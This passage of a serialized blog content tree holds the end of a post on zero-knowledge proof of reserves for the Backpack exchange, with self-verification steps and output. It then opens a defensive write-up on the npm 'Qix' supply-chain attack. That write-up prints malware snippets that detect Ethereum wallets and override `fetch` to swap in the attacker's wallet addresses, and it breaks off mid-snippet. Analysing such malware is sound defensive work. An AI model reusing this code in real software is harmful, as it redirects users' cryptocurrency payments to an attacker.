required:",{"type":25,"tag":2039,"props":100906,"children":100907},{},[100908,100918,100928,100938,100948,100958],{"type":25,"tag":2043,"props":100909,"children":100910},{},[100911,100916],{"type":25,"tag":9273,"props":100912,"children":100913},{},[100914],{"type":31,"value":100915},"Status",{"type":31,"value":100917}," --> verifies if the proof is valid, ensuring that the information has not been tampered with.",{"type":25,"tag":2043,"props":100919,"children":100920},{},[100921,100926],{"type":25,"tag":9273,"props":100922,"children":100923},{},[100924],{"type":31,"value":100925},"Proof Timestamp",{"type":31,"value":100927}," --> when the proof was generated by the exchange.",{"type":25,"tag":2043,"props":100929,"children":100930},{},[100931,100936],{"type":25,"tag":9273,"props":100932,"children":100933},{},[100934],{"type":31,"value":100935},"Verify Timestamp",{"type":31,"value":100937}," --> when the proof was verified by the PoR server.",{"type":25,"tag":2043,"props":100939,"children":100940},{},[100941,100946],{"type":25,"tag":9273,"props":100942,"children":100943},{},[100944],{"type":31,"value":100945},"Proof File URL",{"type":31,"value":100947}," --> the URL where the proof was downloaded from. Users can download it to verify the proof's validity themselves.",{"type":25,"tag":2043,"props":100949,"children":100950},{},[100951,100956],{"type":25,"tag":9273,"props":100952,"children":100953},{},[100954],{"type":31,"value":100955},"Prover Version",{"type":31,"value":100957}," --> the version of PoRv2 used. Using different versions for proving/verifying can result in errors due to ZK circuit discrepancies. Therefore, if you are going to verify the validity of the proof yourself, ensure that you download and use the same prover version as the proof.",{"type":25,"tag":2043,"props":100959,"children":100960},{},[100961,100966],{"type":25,"tag":9273,"props":100962,"children":100963},{},[100964],{"type":31,"value":100965},"File Hash (SHA256)",{"type":31,"value":100967}," --> since we only store the URL of the proof, it can be maliciously changed after our verification. SHA256 can be used to prove if the file was modified after the verification. If you are going to verify the proof by yourself, check if the downloaded zip file matches the hash shown on the website.",{"type":25,"tag":38,"props":100969,"children":100970},{},[100971],{"type":31,"value":100972},"Also, you can check the exchange's liabilities on the website:",{"type":25,"tag":38,"props":100974,"children":100975},{},[100976],{"type":25,"tag":6467,"props":100977,"children":100979},{"alt":54547,"src":100978},"/posts/por/backpack-por-liabilities.png",[],{"type":25,"tag":38,"props":100981,"children":100982},{},[100983,100985,100991,100993,100999],{"type":31,"value":100984},"These are the amount of assets that the exchange should have in their reserves to be solvent on each asset. You can match if they have it by checking their reserve wallets on blockchain. You can see backpack's wallets in ",{"type":25,"tag":162,"props":100986,"children":100989},{"href":100987,"rel":100988},"https://backpack.exchange/reserves",[166],[100990],{"type":31,"value":100987},{"type":31,"value":100992}," and our verifier server for backpack at ",{"type":25,"tag":162,"props":100994,"children":100997},{"href":100995,"rel":100996},"https://backpack-por.osec.io/",[166],[100998],{"type":31,"value":100995},{"type":31,"value":179},{"type":25,"tag":26,"props":101001,"children":101003},{"id":101002},"self-verification",[101004],{"type":31,"value":101005},"Self-verification",{"type":25,"tag":38,"props":101007,"children":101008},{},[101009],{"type":31,"value":101010},"You, as a user, can verify both proofs by yourself, the inclusion proof to verify if you were included in the PoR total liabilities sum and the global proof to verify if the commitments provided by the exchange are valid.",{"type":25,"tag":606,"props":101012,"children":101014},{"id":101013},"how-to-verify-if-i-was-included",[101015],{"type":31,"value":101016},"How to verify if I was included?",{"type":25,"tag":38,"props":101018,"children":101019},{},[101020],{"type":31,"value":101021},"If you are a user and want to do the self-verification of inclusion, you will need to follow these steps:",{"type":25,"tag":6711,"props":101023,"children":101024},{},[101025,101036,101054],{"type":25,"tag":2043,"props":101026,"children":101027},{},[101028,101035],{"type":25,"tag":162,"props":101029,"children":101032},{"href":101030,"rel":101031},"https://github.com/otter-sec/por_v2/releases",[166],[101033],{"type":31,"value":101034},"Download the PoRv2 executable from our github",{"type":31,"value":179},{"type":25,"tag":2043,"props":101037,"children":101038},{},[101039,101041,101046,101047,101052],{"type":31,"value":101040},"Download the inclusion and the final proof files from the exchange (",{"type":25,"tag":82,"props":101042,"children":101044},{"className":101043},[],[101045],{"type":31,"value":100730},{"type":31,"value":1307},{"type":25,"tag":82,"props":101048,"children":101050},{"className":101049},[],[101051],{"type":31,"value":100705},{"type":31,"value":101053},") and put the files in the same directory as the PoRv2 app.",{"type":25,"tag":2043,"props":101055,"children":101056},{},[101057,101059,101065],{"type":31,"value":101058},"Open the terminal and execute this: ",{"type":25,"tag":82,"props":101060,"children":101062},{"className":101061},[],[101063],{"type":31,"value":101064},"./plonky2_por verify-inclusion",{"type":31,"value":179},{"type":25,"tag":38,"props":101067,"children":101068},{},[101069],{"type":31,"value":101070},"This will verify if the proofs are valid and show your asset balances. You will need to verify manually that the balances are correct. Remember that the proofs are not calculated in real-time; you must verify if the balances were correct at the proof generation date. Here is an example of a valid proof being verified:",{"type":25,"tag":206,"props":101072,"children":101074},{"code":101073},"[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Some asset balances was rounded by some decimals, verify if they are close enough to the original balance\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset balances-----\nETH: 0\nBTC: 1.2\nUSDC: 0\n...\n======================\n[!] Verifying global proof (trusting circuit data inside the file)...\n[+] Global proof is valid!\n[!] Verifying inclusion proof...\n[+] Inclusion proof root hash is valid! The user is included in the merkle tree!\n[+] Successfully verified inclusion proof for file: inclusion_proof_00476816e43cf2efffdabdda7f55c5203bc9e28382c551f83931de02fd364a25.json\n\n[+] All inclusion proofs are valid!\n[+] Finished in 13.731875ms!\n",[101075],{"type":25,"tag":82,"props":101076,"children":101077},{"__ignoreMap":7},[101078],{"type":31,"value":101073},{"type":25,"tag":606,"props":101080,"children":101082},{"id":101081},"how-can-i-verify-the-global-proof",[101083],{"type":31,"value":101084},"How can I verify the global proof?",{"type":25,"tag":38,"props":101086,"children":101087},{},[101088],{"type":31,"value":101089},"If you want to verify if the global proof is valid, you just need to follow these steps:",{"type":25,"tag":6711,"props":101091,"children":101092},{},[101093,101102,101120],{"type":25,"tag":2043,"props":101094,"children":101095},{},[101096,101101],{"type":25,"tag":162,"props":101097,"children":101099},{"href":101030,"rel":101098},[166],[101100],{"type":31,"value":101034},{"type":31,"value":179},{"type":25,"tag":2043,"props":101103,"children":101104},{},[101105,101107,101112,101113,101118],{"type":31,"value":101106},"Download the ",{"type":25,"tag":82,"props":101108,"children":101110},{"className":101109},[],[101111],{"type":31,"value":100698},{"type":31,"value":41513},{"type":25,"tag":82,"props":101114,"children":101116},{"className":101115},[],[101117],{"type":31,"value":100705},{"type":31,"value":101119}," files and put them in the same directory as the PoRv2 app. You can download those files from our PoR verifier server (download the zip file and unzip it).",{"type":25,"tag":2043,"props":101121,"children":101122},{},[101123,101125,101130],{"type":31,"value":101124},"Open the terminal and execute ",{"type":25,"tag":82,"props":101126,"children":101128},{"className":101127},[],[101129],{"type":31,"value":101064},{"type":31,"value":101131},". This might take a while to verify since it needs to deserialize a big file and verify the final proof circuit (which involves rebuilding it).",{"type":25,"tag":38,"props":101133,"children":101134},{},[101135],{"type":31,"value":101136},"This will verify the global proof and print the asset prices to be manually verified. Note that the asset prices shown are not real-time; you must match them to the price on the proof generation date and time.",{"type":25,"tag":206,"props":101138,"children":101140},{"code":101139},"[!] Verifying the proof of reserves...\n[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Asset prices was rounded by some decimals, verify if they are close enough to the original price\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset prices-----\nBTC: US$ 95000\nETH: US$ 2402.48\n...\n======================\n",[101141],{"type":25,"tag":82,"props":101142,"children":101143},{"__ignoreMap":7},[101144],{"type":31,"value":101139},{"type":25,"tag":38,"props":101146,"children":101147},{},[101148],{"type":31,"value":101149},"When verification is completed, and all proofs are valid, the system will print the summed balances of each asset. These are the liabilities of the exchange, which you can use to check if they have reserves to cover it.",{"type":25,"tag":206,"props":101151,"children":101153},{"code":101152},"[!] Rebuilding root circuit... This might take several minutes...\n[+] Root circuit rebuilt successfully!\n[!] Verifying final proof...\n[+] Proof is valid!\n[!] Verifying asset prices...\n[+] Asset prices are valid!\n[!] Verifying asset decimals...\n[+] Asset decimals are valid!\n[!] Verifying merkle tree root hash...\n[+] Merkle tree root hash is valid!\n[!] Verifying merkle tree...\n[+] Merkle tree is valid!\n\n[!] The following information is the final needed asset reserves, which was validated by the Zero-Knowledge proof\n[!] NOTE: This is not real-time information, the information is relative to the time of the proof generation\n[!] NOTE2: We cannot guarantee that all users were included in the proof, but you can check if you were included by verifying the inclusion proof\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset reserves-----\nBTC: 1.2\nETH: 5.4\n...\n======================\n\n[+] All proofs are valid!\n[+] Finished in 4.455745214s!\n",[101154],{"type":25,"tag":82,"props":101155,"children":101156},{"__ignoreMap":7},[101157],{"type":31,"value":101152},{"type":25,"tag":26,"props":101159,"children":101160},{"id":32892},[101161],{"type":31,"value":22907},{"type":25,"tag":38,"props":101163,"children":101164},{},[101165],{"type":31,"value":101166},"In conclusion, Proof of Reserves serves as a crucial mechanism for crypto platforms, enabling them to demonstrate solvency and gain user trust in a transparent manner. By employing zero-knowledge proofs, platforms can achieve this transparency without exposing sensitive user data, effectively proving total liabilities and ensuring non-negativity while preserving privacy. Our system further refines this process, boosting efficiency and eliminating the need for manual verification.",{"type":25,"tag":38,"props":101168,"children":101169},{},[101170,101172,101178],{"type":31,"value":101171},"We are currently working with Backpack to implement this algorithm ",{"type":25,"tag":162,"props":101173,"children":101175},{"href":100987,"rel":101174},[166],[101176],{"type":31,"value":101177},"in production",{"type":31,"value":101179}," to generate and verify proofs every 24 hours. This marks a significant advancement toward establishing a real-time Proof of Reserves system, particularly given that it offers increased transparency, which is a step forward in reducing the need for external audit companies, as users will be able to verify everything themselves.",{"type":25,"tag":38,"props":101181,"children":101182},{},[101183,101185,101192],{"type":31,"value":101184},"For more information about how Backpack Exchange implements Proof of Reserves in practice, you can read their detailed article: ",{"type":25,"tag":162,"props":101186,"children":101189},{"href":101187,"rel":101188},"https://learn.backpack.exchange/articles/proof-of-reserves-at-backpack",[166],[101190],{"type":31,"value":101191},"Proof of Reserves at Backpack Exchange: Real Transparency, ZK Verified",{"type":31,"value":179},{"title":7,"searchDepth":6769,"depth":6769,"links":101194},[101195,101196,101197,101198,101201,101206,101210,101211,101215],{"id":96457,"depth":6769,"text":96460},{"id":96538,"depth":6769,"text":96541},{"id":96608,"depth":6769,"text":96611},{"id":96662,"depth":6769,"text":96665,"children":101199},[101200],{"id":96741,"depth":6778,"text":96744},{"id":96829,"depth":6769,"text":96832,"children":101202},[101203,101204,101205],{"id":96902,"depth":6778,"text":96905},{"id":97369,"depth":6778,"text":97372},{"id":99100,"depth":6778,"text":99103},{"id":100679,"depth":6769,"text":100682,"children":101207},[101208,101209],{"id":13237,"depth":6778,"text":100687},{"id":100741,"depth":6778,"text":100744},{"id":100871,"depth":6769,"text":100874},{"id":101002,"depth":6769,"text":101005,"children":101212},[101213,101214],{"id":101013,"depth":6778,"text":101016},{"id":101081,"depth":6778,"text":101084},{"id":32892,"depth":6769,"text":22907},"content:blog:2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds",{"_path":101220,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":101221,"description":101222,"date":101223,"author":35162,"image":101224,"isFeatured":16,"onBlogPage":16,"tags":101227,"body":101230,"_type":6798,"_id":103656,"_source":6800,"_file":103657,"_stem":103658,"_extension":6803},"/blog/2025-09-13-how-to-survive-supply-chain-attacks","How to Survive Supply-Chain Attacks","The recent supply-chain attack on NPM showed how easily trusted dependencies can become delivery vectors for malware. Learn how the attack worked and practical defenses developers can implement to stay safe.","2025-09-13T12:00:00.000Z",{"src":101225,"width":101226,"height":17580},"/posts/supply-chain-attcks/title.png",1536,[101228,101229],"npm","supply-chain",{"type":22,"children":101231,"toc":103639},[101232,101245,101250,101255,101261,101266,101274,101604,101612,102175,102183,102890,102896,102901,102907,102912,102917,102923,102928,102940,102945,102971,103058,103070,103095,103111,103116,103121,103327,103369,103374,103386,103392,103404,103446,103459,103539,103551,103564,103571,103582,103590,103596,103609,103614,103618,103623,103635],{"type":25,"tag":38,"props":101233,"children":101234},{},[101235,101237,101243],{"type":31,"value":101236},"The recent supply-chain attack on NPM sent shockwaves through the developer community and served as a stark reminder of the risks lurking within our dependencies. Malicious versions of widely used packages, including ",{"type":25,"tag":82,"props":101238,"children":101240},{"className":101239},[],[101241],{"type":31,"value":101242},"chalk",{"type":31,"value":101244},", were published containing sophisticated malware designed to steal cryptocurrency.",{"type":25,"tag":38,"props":101246,"children":101247},{},[101248],{"type":31,"value":101249},"This attack highlights a fundamental vulnerability in the open-source ecosystem: any package you install gets the same permissions as your own code, giving it a free pass to important resources such as cookies and the network stack.",{"type":25,"tag":38,"props":101251,"children":101252},{},[101253],{"type":31,"value":101254},"In this post, we'll break down how the malware worked and outline practical defenses developers can use, including Lavamoat, a tool already adopted by leaders in the web3 ecosystem.",{"type":25,"tag":26,"props":101256,"children":101258},{"id":101257},"qix-malware-how-it-worked",[101259],{"type":31,"value":101260},"Qix Malware: How It Worked",{"type":25,"tag":38,"props":101262,"children":101263},{},[101264],{"type":31,"value":101265},"The attacker published modified versions of packages with code designed to do three things:",{"type":25,"tag":6711,"props":101267,"children":101268},{},[101269],{"type":25,"tag":2043,"props":101270,"children":101271},{},[101272],{"type":31,"value":101273},"Detect crypto wallets: The malware checked for Ethereum wallets like MetaMask.",{"type":25,"tag":206,"props":101275,"children":101277},{"code":101276,"language":35327,"meta":7,"className":35325,"style":7},"async function checkethereumw() {\n  try {\n    const _0x124ed3 = await window.ethereum.request({\n      'method': \"eth_accounts\"\n    });\n    if (_0x124ed3.length > 0) {\n      runmask();\n      if (rund != 1) {\n        rund = 1;\n        neth = 1;\n        newdlocal();\n      }\n    } else if (rund != 1) {\n      rund = 1;\n      newdlocal();\n    }\n  }\n}\n",[101278],{"type":25,"tag":82,"props":101279,"children":101280},{"__ignoreMap":7},[101281,101301,101313,101357,101374,101381,101417,101429,101457,101477,101497,101509,101516,101551,101571,101583,101590,101597],{"type":25,"tag":216,"props":101282,"children":101283},{"class":6922,"line":6923},[101284,101288,101292,101297],{"type":25,"tag":216,"props":101285,"children":101286},{"style":6936},[101287],{"type":31,"value":40108},{"type":25,"tag":216,"props":101289,"children":101290},{"style":6936},[101291],{"type":31,"value":42177},{"type":25,"tag":216,"props":101293,"children":101294},{"style":7047},[101295],{"type":31,"value":101296}," checkethereumw",{"type":25,"tag":216,"props":101298,"children":101299},{"style":6964},[101300],{"type":31,"value":19694},{"type":25,"tag":216,"props":101302,"children":101303},{"class":6922,"line":6769},[101304,101309],{"type":25,"tag":216,"props":101305,"children":101306},{"style":6973},[101307],{"type":31,"value":101308},"  try",{"type":25,"tag":216,"props":101310,"children":101311},{"style":6964},[101312],{"type":31,"value":7241},{"type":25,"tag":216,"props":101314,"children":101315},{"class":6922,"line":6778},[101316,101320,101325,101329,101333,101337,101341,101345,101349,101353],{"type":25,"tag":216,"props":101317,"children":101318},{"style":6936},[101319],{"type":31,"value":55636},{"type":25,"tag":216,"props":101321,"children":101322},{"style":6947},[101323],{"type":31,"value":101324}," _0x124ed3",{"type":25,"tag":216,"props":101326,"children":101327},{"style":6953},[101328],{"type":31,"value":6956},{"type":25,"tag":216,"props":101330,"children":101331},{"style":6973},[101332],{"type":31,"value":40174},{"type":25,"tag":216,"props":101334,"children":101335},{"style":6947},[101336],{"type":31,"value":35370},{"type":25,"tag":216,"props":101338,"children":101339},{"style":6964},[101340],{"type":31,"value":179},{"type":25,"tag":216,"props":101342,"children":101343},{"style":6947},[101344],{"type":31,"value":35379},{"type":25,"tag":216,"props":101346,"children":101347},{"style":6964},[101348],{"type":31,"value":179},{"type":25,"tag":216,"props":101350,"children":101351},{"style":7047},[101352],{"type":31,"value":35455},{"type":25,"tag":216,"props":101354,"children":101355},{"style":6964},[101356],{"type":31,"value":19098},{"type":25,"tag":216,"props":101358,"children":101359},{"class":6922,"line":7005},[101360,101365,101369],{"type":25,"tag":216,"props":101361,"children":101362},{"style":8205},[101363],{"type":31,"value":101364},"      'method'",{"type":25,"tag":216,"props":101366,"children":101367},{"style":6947},[101368],{"type":31,"value":1472},{"type":25,"tag":216,"props":101370,"children":101371},{"style":8205},[101372],{"type":31,"value":101373}," \"eth_accounts\"\n",{"type":25,"tag":216,"props":101375,"children":101376},{"class":6922,"line":7110},[101377],{"type":25,"tag":216,"props":101378,"children":101379},{"style":6964},[101380],{"type":31,"value":36219},{"type":25,"tag":216,"props":101382,"children":101383},{"class":6922,"line":7216},[101384,101388,101392,101397,101401,101405,101409,101413],{"type":25,"tag":216,"props":101385,"children":101386},{"style":6973},[101387],{"type":31,"value":16235},{"type":25,"tag":216,"props":101389,"children":101390},{"style":6964},[101391],{"type":31,"value":7016},{"type":25,"tag":216,"props":101393,"children":101394},{"style":6947},[101395],{"type":31,"value":101396},"_0x124ed3",{"type":25,"tag":216,"props":101398,"children":101399},{"style":6964},[101400],{"type":31,"value":179},{"type":25,"tag":216,"props":101402,"children":101403},{"style":6947},[101404],{"type":31,"value":12456},{"type":25,"tag":216,"props":101406,"children":101407},{"style":6953},[101408],{"type":31,"value":18151},{"type":25,"tag":216,"props":101410,"children":101411},{"style":6989},[101412],{"type":31,"value":6992},{"type":25,"tag":216,"props":101414,"children":101415},{"style":6964},[101416],{"type":31,"value":18761},{"type":25,"tag":216,"props":101418,"children":101419},{"class":6922,"line":7244},[101420,101425],{"type":25,"tag":216,"props":101421,"children":101422},{"style":7047},[101423],{"type":31,"value":101424},"      runmask",{"type":25,"tag":216,"props":101426,"children":101427},{"style":6964},[101428],{"type":31,"value":7633},{"type":25,"tag":216,"props":101430,"children":101431},{"class":6922,"line":7257},[101432,101436,101440,101445,101449,101453],{"type":25,"tag":216,"props":101433,"children":101434},{"style":6973},[101435],{"type":31,"value":43250},{"type":25,"tag":216,"props":101437,"children":101438},{"style":6964},[101439],{"type":31,"value":7016},{"type":25,"tag":216,"props":101441,"children":101442},{"style":6947},[101443],{"type":31,"value":101444},"rund",{"type":25,"tag":216,"props":101446,"children":101447},{"style":6953},[101448],{"type":31,"value":68355},{"type":25,"tag":216,"props":101450,"children":101451},{"style":6989},[101452],{"type":31,"value":8471},{"type":25,"tag":216,"props":101454,"children":101455},{"style":6964},[101456],{"type":31,"value":18761},{"type":25,"tag":216,"props":101458,"children":101459},{"class":6922,"line":7275},[101460,101465,101469,101473],{"type":25,"tag":216,"props":101461,"children":101462},{"style":6947},[101463],{"type":31,"value":101464},"        rund",{"type":25,"tag":216,"props":101466,"children":101467},{"style":6953},[101468],{"type":31,"value":6956},{"type":25,"tag":216,"props":101470,"children":101471},{"style":6989},[101472],{"type":31,"value":8471},{"type":25,"tag":216,"props":101474,"children":101475},{"style":6964},[101476],{"type":31,"value":6967},{"type":25,"tag":216,"props":101478,"children":101479},{"class":6922,"line":7296},[101480,101485,101489,101493],{"type":25,"tag":216,"props":101481,"children":101482},{"style":6947},[101483],{"type":31,"value":101484},"        neth",{"type":25,"tag":216,"props":101486,"children":101487},{"style":6953},[101488],{"type":31,"value":6956},{"type":25,"tag":216,"props":101490,"children":101491},{"style":6989},[101492],{"type":31,"value":8471},{"type":25,"tag":216,"props":101494,"children":101495},{"style":6964},[101496],{"type":31,"value":6967},{"type":25,"tag":216,"props":101498,"children":101499},{"class":6922,"line":7305},[101500,101505],{"type":25,"tag":216,"props":101501,"children":101502},{"style":7047},[101503],{"type":31,"value":101504},"        newdlocal",{"type":25,"tag":216,"props":101506,"children":101507},{"style":6964},[101508],{"type":31,"value":7633},{"type":25,"tag":216,"props":101510,"children":101511},{"class":6922,"line":7557},[101512],{"type":25,"tag":216,"props":101513,"children":101514},{"style":6964},[101515],{"type":31,"value":16620},{"type":25,"tag":216,"props":101517,"children":101518},{"class":6922,"line":7574},[101519,101523,101527,101531,101535,101539,101543,101547],{"type":25,"tag":216,"props":101520,"children":101521},{"style":6964},[101522],{"type":31,"value":19737},{"type":25,"tag":216,"props":101524,"children":101525},{"style":6973},[101526],{"type":31,"value":7268},{"type":25,"tag":216,"props":101528,"children":101529},{"style":6973},[101530],{"type":31,"value":19746},{"type":25,"tag":216,"props":101532,"children":101533},{"style":6964},[101534],{"type":31,"value":7016},{"type":25,"tag":216,"props":101536,"children":101537},{"style":6947},[101538],{"type":31,"value":101444},{"type":25,"tag":216,"props":101540,"children":101541},{"style":6953},[101542],{"type":31,"value":68355},{"type":25,"tag":216,"props":101544,"children":101545},{"style":6989},[101546],{"type":31,"value":8471},{"type":25,"tag":216,"props":101548,"children":101549},{"style":6964},[101550],{"type":31,"value":18761},{"type":25,"tag":216,"props":101552,"children":101553},{"class":6922,"line":7591},[101554,101559,101563,101567],{"type":25,"tag":216,"props":101555,"children":101556},{"style":6947},[101557],{"type":31,"value":101558},"      rund",{"type":25,"tag":216,"props":101560,"children":101561},{"style":6953},[101562],{"type":31,"value":6956},{"type":25,"tag":216,"props":101564,"children":101565},{"style":6989},[101566],{"type":31,"value":8471},{"type":25,"tag":216,"props":101568,"children":101569},{"style":6964},[101570],{"type":31,"value":6967},{"type":25,"tag":216,"props":101572,"children":101573},{"class":6922,"line":7604},[101574,101579],{"type":25,"tag":216,"props":101575,"children":101576},{"style":7047},[101577],{"type":31,"value":101578},"      newdlocal",{"type":25,"tag":216,"props":101580,"children":101581},{"style":6964},[101582],{"type":31,"value":7633},{"type":25,"tag":216,"props":101584,"children":101585},{"class":6922,"line":7613},[101586],{"type":25,"tag":216,"props":101587,"children":101588},{"style":6964},[101589],{"type":31,"value":7311},{"type":25,"tag":216,"props":101591,"children":101592},{"class":6922,"line":7636},[101593],{"type":25,"tag":216,"props":101594,"children":101595},{"style":6964},[101596],{"type":31,"value":9823},{"type":25,"tag":216,"props":101598,"children":101599},{"class":6922,"line":7645},[101600],{"type":25,"tag":216,"props":101601,"children":101602},{"style":6964},[101603],{"type":31,"value":7874},{"type":25,"tag":6711,"props":101605,"children":101606},{"start":6769},[101607],{"type":25,"tag":2043,"props":101608,"children":101609},{},[101610],{"type":31,"value":101611},"Intercept HTTP requests/responses and replace blockchain addresses with the attacker's wallet: (modified code for better understanding)",{"type":25,"tag":206,"props":101613,"children":101615},{"code":101614,"language":35327,"meta":7,"className":35325,"style":7},"fetch = async function (...args) {\n  const originalResponse = await originalFetch.call(this, ...args);\n  const contentType = originalResponse.headers.get('Content-Type') || '';\n  let data;\n  if (contentType.includes('application/json')) {\n    data = await originalResponse.clone().json();\n  } else {\n    data = await originalResponse.clone().text();\n  }\n  const processedData = replaceAddresses(data);\n  const finalResponseText =\n    typeof processedData === 'string' ? processedData : JSON.stringify(processedData);\n  const finalResponse = new Response(finalResponseText, {\n    status: originalResponse.status,\n    statusText: originalResponse.statusText,\n    headers: originalResponse.headers,\n  });\n  return finalResponse;\n};\n",[101616],{"type":25,"tag":82,"props":101617,"children":101618},{"__ignoreMap":7},[101619,101654,101711,101773,101788,101825,101864,101879,101918,101925,101958,101974,102033,102071,102096,102121,102145,102153,102168],{"type":25,"tag":216,"props":101620,"children":101621},{"class":6922,"line":6923},[101622,101626,101630,101634,101638,101642,101646,101650],{"type":25,"tag":216,"props":101623,"children":101624},{"style":7047},[101625],{"type":31,"value":38057},{"type":25,"tag":216,"props":101627,"children":101628},{"style":6953},[101629],{"type":31,"value":6956},{"type":25,"tag":216,"props":101631,"children":101632},{"style":6936},[101633],{"type":31,"value":40328},{"type":25,"tag":216,"props":101635,"children":101636},{"style":6936},[101637],{"type":31,"value":42177},{"type":25,"tag":216,"props":101639,"children":101640},{"style":6964},[101641],{"type":31,"value":7016},{"type":25,"tag":216,"props":101643,"children":101644},{"style":6953},[101645],{"type":31,"value":13547},{"type":25,"tag":216,"props":101647,"children":101648},{"style":6947},[101649],{"type":31,"value":42191},{"type":25,"tag":216,"props":101651,"children":101652},{"style":6964},[101653],{"type":31,"value":18761},{"type":25,"tag":216,"props":101655,"children":101656},{"class":6922,"line":6769},[101657,101661,101666,101670,101674,101679,101683,101687,101691,101695,101699,101703,101707],{"type":25,"tag":216,"props":101658,"children":101659},{"style":6936},[101660],{"type":31,"value":40151},{"type":25,"tag":216,"props":101662,"children":101663},{"style":6947},[101664],{"type":31,"value":101665}," originalResponse",{"type":25,"tag":216,"props":101667,"children":101668},{"style":6953},[101669],{"type":31,"value":6956},{"type":25,"tag":216,"props":101671,"children":101672},{"style":6973},[101673],{"type":31,"value":40174},{"type":25,"tag":216,"props":101675,"children":101676},{"style":6947},[101677],{"type":31,"value":101678}," originalFetch",{"type":25,"tag":216,"props":101680,"children":101681},{"style":6964},[101682],{"type":31,"value":179},{"type":25,"tag":216,"props":101684,"children":101685},{"style":7047},[101686],{"type":31,"value":42259},{"type":25,"tag":216,"props":101688,"children":101689},{"style":6964},[101690],{"type":31,"value":1850},{"type":25,"tag":216,"props":101692,"children":101693},{"style":6936},[101694],{"type":31,"value":21651},{"type":25,"tag":216,"props":101696,"children":101697},{"style":6964},[101698],{"type":31,"value":7026},{"type":25,"tag":216,"props":101700,"children":101701},{"style":6953},[101702],{"type":31,"value":13547},{"type":25,"tag":216,"props":101704,"children":101705},{"style":6947},[101706],{"type":31,"value":42191},{"type":25,"tag":216,"props":101708,"children":101709},{"style":6964},[101710],{"type":31,"value":7797},{"type":25,"tag":216,"props":101712,"children":101713},{"class":6922,"line":6778},[101714,101718,101723,101727,101731,101735,101740,101744,101748,101752,101757,101761,101765,101769],{"type":25,"tag":216,"props":101715,"children":101716},{"style":6936},[101717],{"type":31,"value":40151},{"type":25,"tag":216,"props":101719,"children":101720},{"style":6947},[101721],{"type":31,"value":101722}," contentType",{"type":25,"tag":216,"props":101724,"children":101725},{"style":6953},[101726],{"type":31,"value":6956},{"type":25,"tag":216,"props":101728,"children":101729},{"style":6947},[101730],{"type":31,"value":101665},{"type":25,"tag":216,"props":101732,"children":101733},{"style":6964},[101734],{"type":31,"value":179},{"type":25,"tag":216,"props":101736,"children":101737},{"style":6947},[101738],{"type":31,"value":101739},"headers",{"type":25,"tag":216,"props":101741,"children":101742},{"style":6964},[101743],{"type":31,"value":179},{"type":25,"tag":216,"props":101745,"children":101746},{"style":7047},[101747],{"type":31,"value":20310},{"type":25,"tag":216,"props":101749,"children":101750},{"style":6964},[101751],{"type":31,"value":1850},{"type":25,"tag":216,"props":101753,"children":101754},{"style":8205},[101755],{"type":31,"value":101756},"'Content-Type'",{"type":25,"tag":216,"props":101758,"children":101759},{"style":6964},[101760],{"type":31,"value":7036},{"type":25,"tag":216,"props":101762,"children":101763},{"style":6953},[101764],{"type":31,"value":26364},{"type":25,"tag":216,"props":101766,"children":101767},{"style":8205},[101768],{"type":31,"value":35801},{"type":25,"tag":216,"props":101770,"children":101771},{"style":6964},[101772],{"type":31,"value":6967},{"type":25,"tag":216,"props":101774,"children":101775},{"class":6922,"line":7005},[101776,101780,101784],{"type":25,"tag":216,"props":101777,"children":101778},{"style":6936},[101779],{"type":31,"value":11807},{"type":25,"tag":216,"props":101781,"children":101782},{"style":6947},[101783],{"type":31,"value":19062},{"type":25,"tag":216,"props":101785,"children":101786},{"style":6964},[101787],{"type":31,"value":6967},{"type":25,"tag":216,"props":101789,"children":101790},{"class":6922,"line":7110},[101791,101795,101799,101804,101808,101812,101816,101821],{"type":25,"tag":216,"props":101792,"children":101793},{"style":6973},[101794],{"type":31,"value":35356},{"type":25,"tag":216,"props":101796,"children":101797},{"style":6964},[101798],{"type":31,"value":7016},{"type":25,"tag":216,"props":101800,"children":101801},{"style":6947},[101802],{"type":31,"value":101803},"contentType",{"type":25,"tag":216,"props":101805,"children":101806},{"style":6964},[101807],{"type":31,"value":179},{"type":25,"tag":216,"props":101809,"children":101810},{"style":7047},[101811],{"type":31,"value":39144},{"type":25,"tag":216,"props":101813,"children":101814},{"style":6964},[101815],{"type":31,"value":1850},{"type":25,"tag":216,"props":101817,"children":101818},{"style":8205},[101819],{"type":31,"value":101820},"'application/json'",{"type":25,"tag":216,"props":101822,"children":101823},{"style":6964},[101824],{"type":31,"value":39157},{"type":25,"tag":216,"props":101826,"children":101827},{"class":6922,"line":7216},[101828,101832,101836,101840,101844,101848,101852,101856,101860],{"type":25,"tag":216,"props":101829,"children":101830},{"style":6947},[101831],{"type":31,"value":47197},{"type":25,"tag":216,"props":101833,"children":101834},{"style":6953},[101835],{"type":31,"value":6956},{"type":25,"tag":216,"props":101837,"children":101838},{"style":6973},[101839],{"type":31,"value":40174},{"type":25,"tag":216,"props":101841,"children":101842},{"style":6947},[101843],{"type":31,"value":101665},{"type":25,"tag":216,"props":101845,"children":101846},{"style":6964},[101847],{"type":31,"value":179},{"type":25,"tag":216,"props":101849,"children":101850},{"style":7047},[101851],{"type":31,"value":19377},{"type":25,"tag":216,"props":101853,"children":101854},{"style":6964},[101855],{"type":31,"value":34129},{"type":25,"tag":216,"props":101857,"children":101858},{"style":7047},[101859],{"type":31,"value":37960},{"type":25,"tag":216,"props":101861,"children":101862},{"style":6964},[101863],{"type":31,"value":7633},{"type":25,"tag":216,"props":101865,"children":101866},{"class":6922,"line":7244},[101867,101871,101875],{"type":25,"tag":216,"props":101868,"children":101869},{"style":6964},[101870],{"type":31,"value":35430},{"type":25,"tag":216,"props":101872,"children":101873},{"style":6973},[101874],{"